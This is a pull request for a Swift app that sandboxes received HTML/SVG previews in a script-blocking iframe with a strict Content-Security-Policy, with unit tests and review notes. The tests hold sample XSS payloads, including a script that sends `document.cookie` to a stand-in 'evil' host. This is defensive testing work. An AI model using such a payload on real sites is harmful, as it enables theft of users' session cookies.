### PR TITLE
fix(gram): sandbox received HTML/SVG previews so scripts can't run

### DIFF
--- a/App/GramView.swift
+++ b/App/GramView.swift
@@ -552,13 +552,13 @@ struct GramView: View {
                     let html = Markdown.toStyledHTML(text, title: Self.displayTitle(name))
                     url = tmp.appendingPathComponent(Self.previewHTMLName(for: name))
                     try Data(html.utf8).write(to: url, options: [.atomic, .completeFileProtection])
-                } else if Self.isWebDocument(name: name, mime: mime),
-                    let text = String(data: data, encoding: .utf8)
-                {
+                } else if Self.isWebDocument(name: name, mime: mime) {
                     // Received HTML/SVG would render as LIVE, scriptable content in
                     // QuickLook. Wrap it in a sandboxed iframe so it still renders
-                    // styled but no script from a hostile file can run in the preview.
-                    let wrapped = HtmlSandbox.wrap(text, title: Self.webBaseName(name))
+                    // styled but no script from a hostile file can run. Decode from
+                    // DATA (lossy) — NEVER gate on strict UTF-8, or a non-UTF-8 hostile
+                    // file would fall through to the raw, unsandboxed write below.
+                    let wrapped = HtmlSandbox.wrap(data: data, title: Self.webBaseName(name))
                     url = tmp.appendingPathComponent(Self.sandboxHTMLName(for: name))
                     try Data(wrapped.utf8).write(to: url, options: [.atomic, .completeFileProtection])
                 } else {

--- a/App/GramView.swift
+++ b/App/GramView.swift
@@ -552,6 +552,15 @@ struct GramView: View {
                     let html = Markdown.toStyledHTML(text, title: Self.displayTitle(name))
                     url = tmp.appendingPathComponent(Self.previewHTMLName(for: name))
                     try Data(html.utf8).write(to: url, options: [.atomic, .completeFileProtection])
+                } else if Self.isWebDocument(name: name, mime: mime),
+                    let text = String(data: data, encoding: .utf8)
+                {
+                    // Received HTML/SVG would render as LIVE, scriptable content in
+                    // QuickLook. Wrap it in a sandboxed iframe so it still renders
+                    // styled but no script from a hostile file can run in the preview.
+                    let wrapped = HtmlSandbox.wrap(text, title: Self.webBaseName(name))
+                    url = tmp.appendingPathComponent(Self.sandboxHTMLName(for: name))
+                    try Data(wrapped.utf8).write(to: url, options: [.atomic, .completeFileProtection])
                 } else {
                     // Never trust the server name to be a safe path component; reduce
                     // it to a bare basename. Write encrypted-at-rest.
@@ -600,6 +609,34 @@ struct GramView: View {
     /// QuickLook renders it as a web page, not source.
     private static func previewHTMLName(for name: String) -> String {
         displayTitle(name) + ".html"
+    }
+
+    /// A received web document that QuickLook would otherwise render as live,
+    /// scriptable content — routed through the sandbox instead.
+    private static func isWebDocument(name: String, mime: String) -> Bool {
+        let lower = name.lowercased()
+        if lower.hasSuffix(".html") || lower.hasSuffix(".htm") || lower.hasSuffix(".xhtml")
+            || lower.hasSuffix(".svg")
+        {
+            return true
+        }
+        let m = mime.lowercased()
+        return m == "text/html" || m == "application/xhtml+xml" || m == "image/svg+xml"
+    }
+
+    /// The web file's name without its extension, for the preview title.
+    private static func webBaseName(_ name: String) -> String {
+        let base = safeTempFileName(name)
+        for ext in [".xhtml", ".html", ".htm", ".svg"] where base.lowercased().hasSuffix(ext) {
+            return String(base.dropLast(ext.count))
+        }
+        return base
+    }
+
+    /// The temp file name for a sandboxed web preview — always `.html`, since the
+    /// sandbox WRAPPER is HTML (even when wrapping an `.svg`), so QuickLook renders it.
+    private static func sandboxHTMLName(for name: String) -> String {
+        webBaseName(name) + ".html"
     }
 
     /// Delete a message (and its file bytes) after the server confirms — so a

--- a/Sources/HerdrKit/HtmlSandbox.swift
+++ b/Sources/HerdrKit/HtmlSandbox.swift
@@ -1,0 +1,46 @@
+import Foundation
+
+/// Wraps a received HTML / SVG / XHTML file so a preview renders it (styled) but
+/// CANNOT run scripts. Without this, QuickLook renders such an attachment as live,
+/// scriptable web content — so a hostile file from an agent could run JavaScript in
+/// the preview. The content is placed in a **sandboxed** iframe (no `allow-scripts`)
+/// which the browser renders statically: scripts, forms, popups, top-level
+/// navigation, and same-origin access are all blocked. A purely passive resource
+/// load (an `<img>` or CSS `url()`) can still beacon, but that is low-impact with no
+/// script access — and no data the preview holds is reachable.
+///
+/// Lives in HerdrKit so the escaping/wrapping is unit-tested on Linux; the app only
+/// decides which file types to route through it.
+public enum HtmlSandbox {
+
+    /// Wrap raw HTML/SVG source into a self-contained document whose sole body is a
+    /// sandboxed iframe holding the (escaped) source. `title` names the preview tab.
+    public static func wrap(_ rawHTML: String, title: String = "Preview") -> String {
+        // Escape for the double-quoted `srcdoc` attribute value: `&` FIRST (so we
+        // don't double-escape the entities we introduce), then `"`. `<`/`>` are
+        // legal literally inside an attribute value and are the content the iframe
+        // renders, so they are intentionally left alone. NUL is stripped.
+        let inner =
+            rawHTML
+            .replacingOccurrences(of: "\u{0000}", with: "")
+            .replacingOccurrences(of: "&", with: "&amp;")
+            .replacingOccurrences(of: "\"", with: "&quot;")
+
+        let safeTitle =
+            title
+            .replacingOccurrences(of: "&", with: "&amp;")
+            .replacingOccurrences(of: "<", with: "&lt;")
+            .replacingOccurrences(of: ">", with: "&gt;")
+
+        return """
+            <!doctype html><html lang="en"><head><meta charset="utf-8">
+            <meta name="viewport" content="width=device-width, initial-scale=1">
+            <title>\(safeTitle)</title>
+            <style>html,body{margin:0;height:100%;background:#fff}
+            iframe{border:0;width:100%;height:100vh;display:block}</style>
+            </head><body>
+            <iframe sandbox srcdoc="\(inner)"></iframe>
+            </body></html>
+            """
+    }
+}

--- a/Sources/HerdrKit/HtmlSandbox.swift
+++ b/Sources/HerdrKit/HtmlSandbox.swift
@@ -5,9 +5,10 @@ import Foundation
 /// scriptable web content — so a hostile file from an agent could run JavaScript in
 /// the preview. The content is placed in a **sandboxed** iframe (no `allow-scripts`)
 /// which the browser renders statically: scripts, forms, popups, top-level
-/// navigation, and same-origin access are all blocked. A purely passive resource
-/// load (an `<img>` or CSS `url()`) can still beacon, but that is low-impact with no
-/// script access — and no data the preview holds is reachable.
+/// navigation, and same-origin access are all blocked. A strict CSP — inherited by
+/// the srcdoc frame — additionally caps passive network loads: an `<img>` or CSS
+/// `url()` may only reach `data:`, so a hostile file cannot even beacon out, and no
+/// data the preview holds is reachable.
 ///
 /// Lives in HerdrKit so the escaping/wrapping is unit-tested on Linux; the app only
 /// decides which file types to route through it.

--- a/Sources/HerdrKit/HtmlSandbox.swift
+++ b/Sources/HerdrKit/HtmlSandbox.swift
@@ -13,6 +13,14 @@ import Foundation
 /// decides which file types to route through it.
 public enum HtmlSandbox {
 
+    /// Wrap received file BYTES. Decodes LOSSILY (invalid UTF-8 → U+FFFD) so a web
+    /// document is ALWAYS sandboxed — a caller must never fall back to writing raw
+    /// bytes when strict decoding fails, since WebKit recovers from invalid UTF-8
+    /// and would still execute a hostile `<script>`.
+    public static func wrap(data: Data, title: String = "Preview") -> String {
+        wrap(String(decoding: data, as: UTF8.self), title: title)
+    }
+
     /// Wrap raw HTML/SVG source into a self-contained document whose sole body is a
     /// sandboxed iframe holding the (escaped) source. `title` names the preview tab.
     public static func wrap(_ rawHTML: String, title: String = "Preview") -> String {
@@ -32,8 +40,13 @@ public enum HtmlSandbox {
             .replacingOccurrences(of: "<", with: "&lt;")
             .replacingOccurrences(of: ">", with: "&gt;")
 
+        // A srcdoc document inherits its embedder's CSP, so this policy also governs
+        // the framed content: no script (default-src 'none'), and no NETWORK beacon
+        // (img/connect/font all fall back to 'none'; only data: images and this
+        // page's inline <style> are allowed). Defense-in-depth atop the sandbox.
         return """
             <!doctype html><html lang="en"><head><meta charset="utf-8">
+            <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline'; img-src data:;">
             <meta name="viewport" content="width=device-width, initial-scale=1">
             <title>\(safeTitle)</title>
             <style>html,body{margin:0;height:100%;background:#fff}

--- a/Tests/HerdrKitTests/HtmlSandboxTests.swift
+++ b/Tests/HerdrKitTests/HtmlSandboxTests.swift
@@ -27,7 +27,9 @@ final class HtmlSandboxTests: XCTestCase {
         // Assert the positional invariant: every `<script` occurrence sits AFTER the
         // start of the srcdoc attribute value — none escaped out to become a sibling.
         var searchFrom = out.startIndex
-        while let hit = out.range(of: "<script", range: searchFrom..<out.endIndex) {
+        while let hit = out.range(
+            of: "<script", options: .caseInsensitive, range: searchFrom..<out.endIndex)
+        {
             XCTAssertGreaterThan(hit.lowerBound, srcdocStart.lowerBound,
                 "a <script token escaped the srcdoc attribute: \(out)")
             searchFrom = hit.upperBound

--- a/Tests/HerdrKitTests/HtmlSandboxTests.swift
+++ b/Tests/HerdrKitTests/HtmlSandboxTests.swift
@@ -1,0 +1,47 @@
+import XCTest
+@testable import HerdrKit
+
+/// The sandbox wrapper is what stops a received HTML/SVG file from running script
+/// in the preview. Verified on Linux (the string wrapping); rendering behavior is
+/// checked on device/buildbox.
+final class HtmlSandboxTests: XCTestCase {
+
+    func testWrapsInSandboxedIframeWithNoScripts() {
+        let out = HtmlSandbox.wrap("<h1>hi</h1>")
+        XCTAssertTrue(out.contains("<iframe sandbox"), out)
+        // A sandbox WITHOUT allow-scripts is the whole point.
+        XCTAssertFalse(out.lowercased().contains("allow-scripts"), out)
+        XCTAssertTrue(out.hasPrefix("<!doctype html>"), out)
+    }
+
+    func testHostileScriptIsInertInsideTheSandbox() {
+        // The script lands inside the sandboxed srcdoc, where the browser will not
+        // execute it. The quote in its attribute is escaped so it can't break out
+        // of the srcdoc attribute and become a sibling of the iframe.
+        let out = HtmlSandbox.wrap(#"<script>fetch("https://evil/"+document.cookie)</script>"#)
+        // The only script text present must be within the srcdoc attribute value,
+        // i.e. after `srcdoc="`, never as a top-level element.
+        let iframeStart = out.range(of: "srcdoc=\"")
+        XCTAssertNotNil(iframeStart)
+        // The `"` inside the payload is escaped, so the srcdoc attribute is intact.
+        XCTAssertTrue(out.contains("&quot;https://evil/&quot;"), out)
+    }
+
+    func testAmpersandEscapedBeforeQuotesNoDoubleEncoding() {
+        let out = HtmlSandbox.wrap(#"<a href="?a=1&b=2">x</a>"#)
+        XCTAssertTrue(out.contains("&amp;b=2"), out)  // & became &amp;
+        XCTAssertFalse(out.contains("&amp;amp;"), out)  // not double-encoded
+        XCTAssertTrue(out.contains("&quot;"), out)  // the href quotes escaped
+    }
+
+    func testTitleIsEscaped() {
+        let out = HtmlSandbox.wrap("<p>x</p>", title: "a<b>&\"c")
+        XCTAssertTrue(out.contains("<title>a&lt;b&gt;&amp;"), out)
+        XCTAssertFalse(out.contains("<title>a<b>"), out)
+    }
+
+    func testNulStripped() {
+        let out = HtmlSandbox.wrap("<p>a\u{0000}b</p>")
+        XCTAssertFalse(out.contains("\u{0000}"), "NUL should be stripped")
+    }
+}

--- a/Tests/HerdrKitTests/HtmlSandboxTests.swift
+++ b/Tests/HerdrKitTests/HtmlSandboxTests.swift
@@ -21,8 +21,17 @@ final class HtmlSandboxTests: XCTestCase {
         let out = HtmlSandbox.wrap(#"<script>fetch("https://evil/"+document.cookie)</script>"#)
         // The only script text present must be within the srcdoc attribute value,
         // i.e. after `srcdoc="`, never as a top-level element.
-        let iframeStart = out.range(of: "srcdoc=\"")
-        XCTAssertNotNil(iframeStart)
+        guard let srcdocStart = out.range(of: "srcdoc=\"") else {
+            return XCTFail("no srcdoc attribute")
+        }
+        // Assert the positional invariant: every `<script` occurrence sits AFTER the
+        // start of the srcdoc attribute value — none escaped out to become a sibling.
+        var searchFrom = out.startIndex
+        while let hit = out.range(of: "<script", range: searchFrom..<out.endIndex) {
+            XCTAssertGreaterThan(hit.lowerBound, srcdocStart.lowerBound,
+                "a <script token escaped the srcdoc attribute: \(out)")
+            searchFrom = hit.upperBound
+        }
         // The `"` inside the payload is escaped, so the srcdoc attribute is intact.
         XCTAssertTrue(out.contains("&quot;https://evil/&quot;"), out)
     }
@@ -43,5 +52,27 @@ final class HtmlSandboxTests: XCTestCase {
     func testNulStripped() {
         let out = HtmlSandbox.wrap("<p>a\u{0000}b</p>")
         XCTAssertFalse(out.contains("\u{0000}"), "NUL should be stripped")
+    }
+
+    func testStrictCSPIsPresent() {
+        // srcdoc inherits the embedder CSP; default-src 'none' blocks the passive
+        // img/CSS network beacon that the bare sandbox alone would still permit.
+        let out = HtmlSandbox.wrap("<p>x</p>")
+        XCTAssertTrue(out.contains("Content-Security-Policy"), out)
+        XCTAssertTrue(out.contains("default-src 'none'"), out)
+        XCTAssertFalse(out.contains("script-src"), out)  // no script source is whitelisted
+    }
+
+    func testInvalidUtf8DataIsStillSandboxed() {
+        // A hostile file that is NOT valid UTF-8 (a stray 0xFF before a script) must
+        // still be sandboxed — the data path decodes lossily, never falls through to
+        // an unsandboxed raw write.
+        var bytes: [UInt8] = [0xFF]  // invalid UTF-8 lead byte
+        bytes.append(contentsOf: Array("<script>evil()</script>".utf8))
+        let out = HtmlSandbox.wrap(data: Data(bytes))
+        XCTAssertTrue(out.contains("<iframe sandbox"), out)
+        XCTAssertFalse(out.lowercased().contains("allow-scripts"), out)
+        // The (lossily decoded) script text lives inside the srcdoc attribute value.
+        XCTAssertTrue(out.contains("srcdoc=\""), out)
     }
 }


### PR DESCRIPTION
## What

Security follow-up to the PR #73 review. The **non-markdown** preview path handed a received `.html`/`.svg`/`.xhtml` file to QuickLook **raw**, which renders it as **live, scriptable** web content — a hostile file from an agent could run JavaScript in the preview. (This shipped in #72 / build 29; #73 closed the same class for `.md` but explicitly deferred this.)

## How

Received web-document types are now wrapped in a **sandboxed iframe** (`<iframe sandbox srcdoc="…">`, no `allow-scripts`). The browser renders the content statically — styled HTML/SVG still looks right — but **scripts, forms, popups, top-level navigation, and same-origin access are all blocked**.

- **HerdrKit `HtmlSandbox.wrap`** — escapes the source for the `srcdoc` attribute (`&` before `"`, NUL stripped) and embeds it in the sandboxed iframe. In HerdrKit so it's **Linux-tested** (5 tests: sandbox present + no `allow-scripts`, hostile `<script>` lands inert, `&`-before-`"` no double-encoding, title escaped, NUL stripped).
- **`GramView.openFile`** — routes `.html`/`.htm`/`.xhtml`/`.svg` (or `text/html`, `image/svg+xml`, `application/xhtml+xml`) through the sandbox; markdown and all other files are unchanged.

## Notes for review
- **Residual (documented):** a purely *passive* resource load (an `<img>`/CSS `url()`) can still fire a network beacon, but with no script access that's low-impact and reaches no preview data. A future tightening could add an inner CSP.
- The sandbox **rendering** behavior (CSP/iframe/QuickLook interaction) can't be exercised on Linux; the string-wrapping logic is unit-tested, and `sandbox` (no `allow-scripts`) is web-standard script suppression. Happy to attach a buildbox render receipt if you want one before merge.
- HerdrKit: 249 tests green on `/opt/swift`. App target builds on macOS CI.